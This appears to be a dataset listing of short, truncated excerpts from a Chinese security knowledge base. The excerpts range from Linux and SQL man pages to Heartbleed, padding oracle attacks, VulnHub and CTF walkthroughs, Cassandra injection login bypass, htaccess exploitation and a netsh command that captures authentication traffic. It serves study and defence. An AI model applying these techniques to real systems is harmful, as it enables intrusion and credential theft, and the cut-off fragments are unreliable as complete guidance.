.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "DROP AGGREGATE" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands" .SH NAME DROP AGGREGATE \- 删除一个用户定义的聚集函数 .SH SYNOPSIS .sp .nf DROP AGGREGATE \fIname\fR ( \fItype\fR ) [ CASCADE | RESTRICT ] .sp .fi .SH "DESCRIPTION 描述" .PP \fBDROP AGGREGATE\fR 将删除...
sec-knowleage
ssh-add === 把专用密钥添加到ssh-agent的高速缓存中 ## 补充说明 **ssh-add命令** 是把专用密钥添加到ssh-agent的高速缓存中。该命令位置在`/usr/bin/ssh-add`。 ### 语法 ```shell ssh-add [-cDdLlXx] [-t life] [file ...] ssh-add -s pkcs11 ssh-add -e pkcs11 ``` ### 选项 ```shell -D:删除ssh-agent中的所有密钥. -d:从ssh-agent中的删除密钥 -e pkcs11:删除PKCS#11共享库pkcs1提供的钥匙。 -s pkcs11:添加PKCS#11共享...
sec-knowleage
.\" Copyright (c) 1991, 1992, 1993, 1995, 1998, 1999, 2000 Free Software Foundation .\" See section COPYING for conditions for redistribution .TH ar 1 "1999" "Free Software Foundation" "GNU 开发工具" .de BP .sp .ti \-.2i \(** .. .SH NAME ar \- 建立,修改档案或从档案中抽取成员。 .SH 总览 .hy 0 .na .BR ar " [\|" "-" "\|]"\c .I {dmpqrtx}[abcfil...
sec-knowleage
# OpenSSL 心脏出血漏洞(CVE-2014-0160) 心脏出血是OpenSSL库中的一个内存漏洞,攻击者利用这个漏洞可以服务到目标进程内存信息,如其他人的Cookie等敏感信息。 参考链接: - https://heartbleed.com/ - https://filippo.io/Heartbleed ## 环境搭建 运行如下命令启动一个使用了OpenSSL 1.0.1c的Nginx服务器: ``` docker compose up -d ``` 环境启动后,访问`https://your-ip:8443`即可查看到hello页面(需要忽略https错误)。 > 我们在运行这个环境的时候遇到过一个错误...
sec-knowleage
# Padding Oracle Attack ## 介绍 Padding Oracle Attack 攻击一般需要满足以下几个条件 - 加密算法 - 采用 PKCS5 Padding 的加密算法。 当然,非对称加密中 OAEP 的填充方式也有可能会受到影响。 - 分组模式为 CBC 模式。 - 攻击者能力 - 攻击者可以拦截上述加密算法加密的消息。 - 攻击者可以和 padding oracle(即服务器) 进行交互:客户端向服务器端发送密文,服务器端会以某种返回信息告知客户端 padding 是否正常。 Padding Oracle Attack 攻击可以达到的效果如下 - 在不清楚 key 和 ...
sec-knowleage
--- title: Ghost Phisher categories: Information Gathering tags: [kali linux,wireless attacks,information gathering,ghost phisher] date: 2016-10-25 11:50:00 --- 0x00 Ghost Phisher介绍 ------------- Ghost Phisher是一个使用Python编程语言和Python Qt GUI库编写的无线和以太网安全审计和攻击程序,可以伪造DNS服务器、DHCP服务器、HTTP服务器并且内置自动抓取和记录认证信息的功能模块。这个程序可用于制作蜜罐,也可用...
sec-knowleage
# SUNSET MIDNIGHT > https://download.vulnhub.com/sunset/midnight.7z 靶场IP:`192.168.2.4 ` 扫描对外端口 ``` ┌──(root㉿kali)-[~/Desktop] └─# nmap -p1-65535 -sV 192.168.2.4 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-04 07:13 EDT Nmap scan report for 192.168.2.4 Host is up (0.000080s latency). Not shown: 65532 closed tcp po...
sec-knowleage
groupadd === 用于创建一个新的工作组 ## 补充说明 **groupadd命令** 用于创建一个新的工作组,新工作组的信息将被添加到系统文件中。 ### 语法 ```shell groupadd(选项)(参数) ``` ### 选项 ```shell -g:指定新建工作组的id; -r:创建系统工作组,系统工作组的组ID小于500; -K:覆盖配置文件“/etc/login.defs”; -o:允许添加组ID号不唯一的工作组。 ``` ### 参数 组名:指定新建工作组的组名。 ### 实例 建立一个新组,并设置组ID加入系统: ```shell groupadd -g 344 jsdigname ``` 此时在...
sec-knowleage
# Inclusiveness > https://download.vulnhub.com/inclusiveness/Inclusiveness.ova 靶场IP:`192.168.32.23` 扫描对外端口服务 ``` ┌──(root㉿kali)-[/tmp] └─# nmap -sV -p1-65535 192.168.32.23 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-14 01:43 EDT Nmap scan report for 192.168.32.23 Host is up (0.00014s latency). Not shown: 65532 c...
sec-knowleage
#!/usr/bin/env python from Crypto.Util.number import * from gmpy import * import os,sys sys.stdin = os.fdopen(sys.stdin.fileno(), 'r', 0) sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0) def genKey(): p = getPrime(512) q = getPrime(512) n = p*q phi = (p-1)*(q-1) while True: e = getRandomInteger(40) ...
sec-knowleage
# CoolNAME Checker [324 points] (19 solves) Files: - This challenge provided a [link](http://reverse-lookup.hackable.software) ## Part 0: research The website allows us to enter an IP and the server will make a DNS request to it (judging from the name it's going to be a CNAME DNS query). Below is a quick nonce solver ...
sec-knowleage
# Challenge #1 Solved together with YaakovCohen88 ## Description > Welcome Agent. > > A team of field operatives is currently on-site in enemy territory, working to retrieve intel on an imminent terrorist attack. > > The intel is contained in a safe, the plans for which are available to authorized > clients via an ap...
sec-knowleage
原文 by [看雪学院](https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458286843&idx=1&sn=15e3d1aa8ae418cc5ed6010b390388b6&chksm=b1814a7186f6c367a24033a297edc3fe2275334f45fd0b944bb606dc449e027beb1b4bc6997d&scene=0#rd) 这是关于使用htaccess进行开发的两部分系列的第一部分。我将在这里介绍一些基本的、众所周知的方法,还有一些鲜为人知的方法。在第2部分中,我将通过使用htaccess来开发更高级的开发方法。 在本指南...
sec-knowleage
# OpenSSL Heartbleed Vulnerability (CVE-2014-0160) [中文版本(Chinese version)](README.zh-cn.md) The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure th...
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH DU 1 2022年9月 "GNU coreutils 9.1" ...
sec-knowleage
# Johannesburg - Hideout Category: Reversing ## Description > Johannesburg is hot, and you are on your way to the secret lair. It seems like it is well fortified, even though you are expected under the alias of the assassin, perhaps it will be a better idea to sneak inside the lair, unseen? You climb up on a brick wall...
sec-knowleage
.\" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .\" DO NOT EDIT! Generated from XML source. .\" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .de Sh \" Subsection .br .if t .Sp .ne 5 .PP \fB\\$1\fR .PP .. .de Sp \" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de Ip \" List item .br .ie \\n(.$>=3 .ne \\$3 .e...
sec-knowleage
# T1543-003-windows服务-Dnscmd.exe(白名单) ## 来自ATT&CK描述 作为持久性的一部分,攻击者可能会创建或修改Windows服务以重复执行恶意负载。当Windows启动时,它会启动程序或称为服务的应用程序来执行后台系统功能。Windows服务配置信息,包括服务的可执行文件或恢复程序/命令的文件路径,存储在 Windows 注册表中。可以使用sc.exe和Reg等实用程序修改服务配置。 攻击者可以通过使用系统实用程序与服务交互、直接修改注册表或使用自定义工具与Windows API交互来安装新服务或修改现有服务。攻击者可能会将服务配置为在启动时执行,以便在系统上建立持久性。 攻击者还可以通过使用来自...
sec-knowleage
# 链接 列表 ## Microsoft ### Powershell * [Powershell 101](https://hkh4cks.com/blog/2018/01/01/powershell-101/) * [一个月起步学习Powershell](https://www.youtube.com/playlist?list=PL6D474E721138865A) * [p3nt4/PowerShdll](https://github.com/p3nt4/PowerShdll) - 使用dll运行Powershell,这样就不需要使用Powershell.exe * [nullbind/Powershellery](http...
sec-knowleage
# Patches' Punches Reversing, 50 points ## Description > That moment when you go for a body slam and you realize you jump too far. Adjust your aim, and you'll crush this challenge! A binary file was attached. ## Solution Let's run the file: ```console root@kali:/media/sf_CTFs/sunshine/Patches_Punches# ./patches Woah th...
sec-knowleage
.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "START TRANSACTION" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands" .SH NAME START TRANSACTION \- 开始一个事务块 .SH SYNOPSIS .sp .nf START TRANSACTION [ ISOLATION LEVEL { READ COMMITTED | SERIALIZABLE } ] [ READ WRITE | READ ONLY ] .sp .fi .SH "DESCRIPTI...
sec-knowleage
xargs === 给其他命令传递参数的一个过滤器 ## 补充说明 **xargs 命令** 是给其他命令传递参数的一个过滤器,也是组合多个命令的一个工具。它擅长将标准输入数据转换成命令行参数,xargs 能够处理管道或者 stdin 并将其转换成特定命令的命令参数。xargs 也可以将单行或多行文本输入转换为其他格式,例如多行变单行,单行变多行。xargs 的默认命令是 echo,空格是默认定界符。这意味着通过管道传递给 xargs 的输入将会包含换行和空白,不过通过 xargs 的处理,换行和空白将被空格取代。xargs 是构建单行命令的重要组件之一。 ### xargs 命令用法 xargs 用作替换工具,读取输入数据重新格式...
sec-knowleage
# Cassandra Injection > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system ## Summary * [Cassandra comment](#cassandra-comment) * [Cassandra - Login Bypass](#cassandra---login-bypass) * [Login Bypass 0](#login-bypass-0) * [Login Bypass 1](#login-bypass-1) * [Re...
sec-knowleage
# 本地抓包 --- ## 开启记录功能 Windows 系统自带的 netsh 中的 trace 功能能够实现不安装任何第三方依赖库,在命令行下进行抓包 ``` netsh trace start capture=yes persistent=yes traceFile="c:\\in.etl" overwrite=yes correlation=no protocol=tcp ipv4.address=192.168.1.1 keywords=ut:authentication ``` - capture=yes: 开启抓包功能 - persistent=yes: 系统重启不关闭抓包功能,只能通过Netsh trace stop...
sec-knowleage
## Crypto 400 (crypto, 400p) ### PL [ENG](#eng-version) Dostajemy cztery ciphertexty, oraz trzy odpowiadające im plaintexty. W czwartym ciphertexcie znajduje się flaga, i naszym zadaniem jest odzyskać ją: ```python inp0 = "People don't understand computers. Computers are magical boxes that do things. People believe wh...
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH MKFIFO 1 2022年9月 "GNU coreutils 9...
sec-knowleage
# 论文日读:Mining Data Provenance to Detect Advanced Persistent Threats 论文文件:https://mega.nz/file/xUwEUbaB#ToXxphdoukRIFO6B8RUr6Gpc3WDR51PXtgwqkpR0bpY
sec-knowleage
bzcmp === 比较两个压缩包中的文件 ## 补充说明 **bzcmp命令** 主要功能是在不真正解压缩.bz2压缩包的情况下,比较两个压缩包中的文件,省去了解压缩后在调用cmp命令的过程。 ### 语法 ```shell bzcmp(参数) ``` ### 参数 * 文件1:指定要比较的第一个.bz2压缩包; * 文件2:指定要比较的第二个.bz2压缩包。
sec-knowleage
### FTP相关介绍 `FTP` ( `File Transfer Protocol` ,即文件传输协议)是 `TCP/IP` 协议组中的协议之一。 `FTP` 协议包括两个组成部分,其一为 `FTP` 服务器,其二为 `FTP` 客户端。其中 `FTP` 服务器用来存储文件,用户可以使用 `FTP` 客户端通过 `FTP` 协议访问位于 `FTP` 服务器上的资源。在开发网站的时候,通常利用 `FTP` 协议把网页或程序传到 `Web` 服务器上。此外,由于 `FTP` 传输效率非常高,在网络上传输大的文件时,一般也采用该协议。 默认情况下 `FTP` 协议使用 `TCP` 端口中的 `20` 和 `21` 这两个端口,其中 `...
sec-knowleage
# Musicetry (Misc 200) ``` They should have forbidden this from the moment they hear abou the idea! Damn circles, rectangles is all we needed! ``` ###ENG [PL](#pl-version) In the task we get a webpage with a CD picture. We thought this might be stegano, but the picture was `.jpg` and it was hotlinked from a legitimate...
sec-knowleage
# 计算机网络 - 传输层 <!-- GFM-TOC --> * [计算机网络 - 传输层](#计算机网络---传输层) * [UDP 和 TCP 的特点](#udp-和-tcp-的特点) * [UDP 首部格式](#udp-首部格式) * [TCP 首部格式](#tcp-首部格式) * [TCP 的三次握手](#tcp-的三次握手) * [TCP 的四次挥手](#tcp-的四次挥手) * [TCP 可靠传输](#tcp-可靠传输) * [TCP 滑动窗口](#tcp-滑动窗口) * [TCP 流量控制](#tcp-流量控制) * [TCP 拥塞控制](#tcp...
sec-knowleage